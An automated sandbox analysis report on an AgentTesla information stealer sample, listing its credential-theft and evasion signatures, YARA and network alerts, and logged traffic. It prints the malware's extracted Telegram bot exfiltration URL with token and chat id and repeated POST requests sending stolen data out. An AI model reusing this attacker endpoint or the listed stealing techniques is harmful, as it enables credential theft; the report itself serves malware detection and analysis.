Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002A_127.exe

Overview

General Information

Sample name:LisectAVT_2403002A_127.exe
Analysis ID:1482510
MD5:67cf14e98914a0ae61cda009d3ed1df7
SHA1:4bf4a1f9365eb649a2fdf1a30b2e4c149fad03dc
SHA256:79d0926744b84fc30f2a528b4aa64b2aa015001616f7062f15695fa00de45081
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • LisectAVT_2403002A_127.exe (PID: 5396 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe" MD5: 67CF14E98914A0AE61CDA009D3ED1DF7)
    • LisectAVT_2403002A_127.exe (PID: 5020 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe" MD5: 67CF14E98914A0AE61CDA009D3ED1DF7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendMessage?chat_id=1394550246"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 14 entries
              SourceRuleDescriptionAuthorStrings
              0.2.LisectAVT_2403002A_127.exe.428d518.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.LisectAVT_2403002A_127.exe.428d518.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.LisectAVT_2403002A_127.exe.428d518.5.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.LisectAVT_2403002A_127.exe.428d518.5.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x3152c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x3159e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x31628:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x316ba:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x31724:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x31796:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x3182c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x318bc:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 17 entries
                      No Sigma rule has matched
                      No Snort rule has matched
                      Timestamp:2024-07-26T00:02:16.228907+0200
                      SID:2852815
                      Source Port:49745
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:01:20.476194+0200
                      SID:2852815
                      Source Port:49734
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:03:12.778554+0200
                      SID:2852815
                      Source Port:49755
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:03:04.473362+0200
                      SID:2852815
                      Source Port:49752
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:01:18.963992+0200
                      SID:2852815
                      Source Port:49733
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:02:49.873314+0200
                      SID:2852815
                      Source Port:49750
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:03:17.387586+0200
                      SID:2852815
                      Source Port:49757
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:02:30.614435+0200
                      SID:2852815
                      Source Port:49747
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:00:57.740029+0200
                      SID:2852815
                      Source Port:49730
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:00:52.810767+0200
                      SID:2852815
                      Source Port:49728
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:02:08.271354+0200
                      SID:2852815
                      Source Port:49742
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:01:35.574667+0200
                      SID:2852815
                      Source Port:49736
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:01:42.459543+0200
                      SID:2852815
                      Source Port:49738
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-25T23:59:27.125307+0200
                      SID:2022930
                      Source Port:443
                      Destination Port:49719
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-26T00:02:21.632702+0200
                      SID:2852815
                      Source Port:49746
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:02:59.571959+0200
                      SID:2852815
                      Source Port:49751
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:02:09.266140+0200
                      SID:2852815
                      Source Port:49743
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:00:59.090939+0200
                      SID:2852815
                      Source Port:49731
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:01:40.324857+0200
                      SID:2852815
                      Source Port:49737
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:02:00.361986+0200
                      SID:2852815
                      Source Port:49741
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:01:22.620409+0200
                      SID:2852815
                      Source Port:49735
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:03:05.972685+0200
                      SID:2852815
                      Source Port:49753
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-25T23:59:19.197358+0200
                      SID:2852815
                      Source Port:49717
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:00:04.546790+0200
                      SID:2022930
                      Source Port:443
                      Destination Port:49725
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-26T00:01:48.498588+0200
                      SID:2852815
                      Source Port:49740
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:01:11.484324+0200
                      SID:2852815
                      Source Port:49732
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:02:41.578349+0200
                      SID:2852815
                      Source Port:49748
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:03:08.262544+0200
                      SID:2852815
                      Source Port:49754
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T00:02:12.072219+0200
                      SID:2852815
                      Source Port:49744
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: LisectAVT_2403002A_127.exeAvira: detected
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendMessage?chat_id=1394550246"}
                      Source: LisectAVT_2403002A_127.exe.5396.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendMessage"}
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: LisectAVT_2403002A_127.exeJoe Sandbox ML: detected
                      Source: LisectAVT_2403002A_127.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49757 version: TLS 1.2
                      Source: LisectAVT_2403002A_127.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: gpjZ.pdb source: LisectAVT_2403002A_127.exe
                      Source: Binary string: gpjZ.pdbSHA256 source: LisectAVT_2403002A_127.exe

                      Networking

                      barindex
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcacd37f51b3f3Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb9d07bd4088fHost: api.telegram.orgContent-Length: 59488Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcbd2f89f881a1Host: api.telegram.orgContent-Length: 57562Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcbf70b25255b6Host: api.telegram.orgContent-Length: 57562Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc56227d5fe15Host: api.telegram.orgContent-Length: 57551Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc9f9cbbe4ea1Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dccc3999cbfb48Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcceb63c23233eHost: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd5311bcd1988Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd883f159ae3dHost: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcdb04645b2b88Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcdf0de441e7a8Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce4e1dc8f71b2Host: api.telegram.orgContent-Length: 57551Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce963108a87c4Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcec75a72c3e04Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcef2136d34414Host: api.telegram.orgContent-Length: 57558Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf244c2bc1a24Host: api.telegram.orgContent-Length: 61460Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf5eb5d0922e3Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcfac024112999Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0041be87c706Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd077b581d181aHost: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0c9d0c344755Host: api.telegram.orgContent-Length: 57558Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1001a144c656Host: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1279d3482702Host: api.telegram.orgContent-Length: 60931Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd14f0e836a8c1Host: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd183344abb936Host: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd1ad724ca83faHost: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcacd40e7a0308Host: api.telegram.orgContent-Length: 57561Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcacd37f51b3f3Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000325A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003309000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000325A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003186000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003309000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument
                      Source: LisectAVT_2403002A_127.exeString found in binary or memory: https://download.alegsoftware.ga/ws_switches/contatore/ltromatic.ttf
                      Source: LisectAVT_2403002A_127.exeString found in binary or memory: https://fsf.org/
                      Source: LisectAVT_2403002A_127.exeString found in binary or memory: https://www.gnu.org/licenses/
                      Source: LisectAVT_2403002A_127.exeString found in binary or memory: https://www.gnu.org/licenses/why-not-lgpl.html
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
